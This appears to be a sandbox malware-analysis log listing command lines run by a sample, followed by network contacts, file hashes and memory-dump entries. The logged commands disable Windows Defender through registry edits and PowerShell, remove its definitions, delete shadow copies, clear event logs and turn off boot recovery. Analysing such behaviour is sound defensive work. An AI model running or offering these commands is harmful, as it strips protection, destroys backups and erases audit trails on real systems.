reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 13.107.4.50:80 | tcp | |
| US | 13.107.4.50:80 | tcp |
Files
memory/1860-130-0x000001D3EC370000-0x000001D3EC392000-memory.dmp
memory/1860-131-0x00007FFB2BB10000-0x00007FFB2C5D1000-memory.dmp
memory/1860-132-0x000001D3EC363000-0x000001D3EC365000-memory.dmp
memory/1860-133-0x000001D3EC360000-0x000001D3EC362000-memory.dmp
memory/1860-134-0x000001D3EC366000-0x000001D3EC368000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
memory/3336-137-0x00007FFB2BB10000-0x00007FFB2C5D1000-memory.dmp
memory/3336-138-0x0000017E7D490000-0x0000017E7D54D000-memory.dmp
memory/3336-139-0x0000017E7D490000-0x0000017E7D54D000-memory.dmp
memory/3336-140-0x0000017E7D490000-0x0000017E7D54D000-memory.dmp
memory/3336-141-0x0000017E7D490000-0x0000017E7D54D000-memory.dmp